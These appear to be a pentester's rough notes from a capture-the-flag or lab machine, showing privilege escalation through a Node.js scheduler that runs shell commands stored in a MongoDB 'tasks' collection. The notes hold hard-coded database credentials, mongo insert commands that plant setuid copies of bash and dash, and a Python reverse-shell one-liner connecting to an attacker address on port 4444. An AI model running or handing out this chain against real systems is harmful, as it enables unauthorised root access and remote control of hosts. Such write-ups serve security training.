ps -ef | grep sched  ..running as 'tom'
Found 'mongo' running with localhost:27017

/usr/bin/node /var/www/myplace/app.js    ..service running as who?
/usr/bin/node /var/scheduler/app.js

cat /var/scheduler/app.js
cat /var/www/myplace/app.js

const url = 'mongodb://mark:mypassword@localhost:27017/scheduler';
MongoClient.connect(url, function(error, db) {}
setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});

mongo -u mark -p mypass localhost:27017/scheduler
> show dbs
> use scheduler
> show collections
> db.tasks.find()
> db.tasks.insert({"cmd":"cp /bin/dash /tmp/rootdash; chmod u+s /tmp/rootdash;}
> db.tasks.insert({"cmd":"cp /bin/bash /tmp/tombash; chown tom:admin /tmp/tombash;chmod +s /tmp/tombash"})
> db.tasks.insert({"cmd":"/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
> db.tasks.insert({"cmd":"chown tom:admin /tmp/rootdash; chmod 6755 /tmp/rootdash;"}
> db.tasks.insert({"cmd":"bash /tmp/shell.sh" });
> db.tasks.insert({"cmd":"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.x.x.x\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})

.. sometimes 'bash' will drop the suid bits
.. dash will usually keep them if you set!

/tmp/rootdash -p   
whoami ..tom !!